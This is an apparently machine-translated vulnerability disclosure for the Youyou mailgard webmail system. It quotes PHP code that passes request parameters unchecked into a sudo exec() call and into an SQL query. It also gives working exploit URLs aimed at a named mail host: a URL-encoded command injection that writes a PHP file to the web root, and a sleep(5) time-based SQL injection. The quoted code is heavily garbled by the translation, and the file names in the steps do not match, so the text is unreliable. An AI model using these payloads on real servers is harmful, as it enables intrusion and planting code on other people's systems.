Youyou mailgard webmail mail system SQL injection and command execution (login required)

Youyou mailgard webmail mail system SQL injection and command execution (login required)

Show_mail.php:

Require_once ('.. /global. php '); // GET the parameter information $ t_get_sd = urldecode ($ _ GET ['sd']); $ _ GET ['sd'] = strlen ($ _ GET ['sd'])> strlen ($ t_get_sd )? $ T_get_sd: $ _ GET ['sd']; list ($ box_name, $ uid) = explode (':', $ _ GET ['sd']); $ box_name = ($ box_name); $ get_sd = urlencode ($ box_name ). ":". $ uid; if (strpos ($ _ COOKIE ['my _ referer'], 'box _ list. php? Sd = hicommail_search ')! = False) {if (strpos ($ _ COOKIE ['my _ referer'], '& labelMail = 1 ')! = False) {$ label = 'star'; $ label2 = 'star2';} else {$ label = 'search'; $ label2 = 'search2 ';}} if ($ _ GET ['delmove ']) {// move, delete, and mark the star action, the search and star id session records are cleared // prevent clearing: record the SESSION if ($ _ SESSION ['h _ MAILS '] [$ label] ['box: uid']) used only on the show_mail.php page. {$ _ SESSION ['h _ MAILS '] [$ label2] ['box: uid'] = $ _ SESSION ['h _ MAILS '] [$ label] ['box: uid'];} if ($ _ GET ['delmove '] = 'delete' & $ box_name = 'trash' | $ _ GET ['delmove '] = 'shiftdelete ') {select_ma Ilbox ($ connection, $ box_name); $ deleted = mail_flags ($ connection, '\ deleted',' + ', $ uid );} else {if ($ _ GET ['delmove '] = 'delete' & $ box_name! = 'Trash ') {$ toBox = 'trash';} elseif ($ _ GET ['delmove '] = 'move ') {$ toBox = $ _ GET ['toboxname'];} if ($ gDoveadm = '0') {$ toBox = mb_convert_encoding ($ toBox, 'utf-8 ', 'utf7-imap'); $ boxnm = mb_convert_encoding ($ box_name, 'utf-8', 'utf7-imap '); exec ("sudo/usr/bin/doveadm move-u ". $ gMyAccounts. "'". $ toBox. "'mailbox '". $ boxnm. "'uid ". $ uid );

Find a User Logon:

Sending url:

Http://mail.iconergy.com: 889/src/show_mail.php? Sd = aaaa % 253A % 2520% 2526% 2520 echo % 2520% 2527% 253C % 253 Fphp % 2520 phpinfo %

2528% 2529% 253F % 253E % 2527% 2520% 253E % 2520% fvar % 252 fwww % 252 fnewmail %

252fccc. php & delMove = move & toBoxName = yyy

Access:

Http://mail.iconergy.com: 889/bbb. php

SQL Injection:

Write_mail.php:

Require_once ('.. /global. php '); $ filetime = time (); $ defAllUFSize = $ defAllUFId = 0; $ defImgsVal = $ defFilesVal = ''; $ defUFSUnit = $ defAllUFSize. 'B'; $ dir = HM_ROOT. $ gSubTmpUploadDir; if (! Is_dir ($ dir) {@ mkdir ($ dir, 0722, true); // layer-by-layer check to create 0700 permissions} if ($ _ GET ['manid']) {$ to = getLinkmanByManid ($ _ GET ['manid']);

Follow in to getLinkmanByManid to see:

/*

* Email writing

/** Write email */function getLinkmanByManid ($ manId) {global $ db, $ gMyAccounts; $ linkSql = "SELECT * FROM 'linkman' WHERE 'man _ id' IN ($ manId) order by 'sort '"; $ linkResult = $ db-> query ($ linkSql); while ($ linkRs = $ db-> fetch_array ($ linkResult )) {$ rs [] = $ linkRs ['name']? '"'. $ LinkRs ['name']. '"<'. $ linkRs ['mail _ addr ']. '>': $ linkRs ['mail _ addr '];} if ($ rs) {$ rs = implode ('; ', $ rs );} else {$ rs = '';} return $ rs ;}

Direct Request:

Http://mail.iconergy.com: 889/src/write_mail.php? ManId = sleep (5)

This causes a delay. Here we will not talk much about constructing SQL statements.

Solution: enhanced Filtering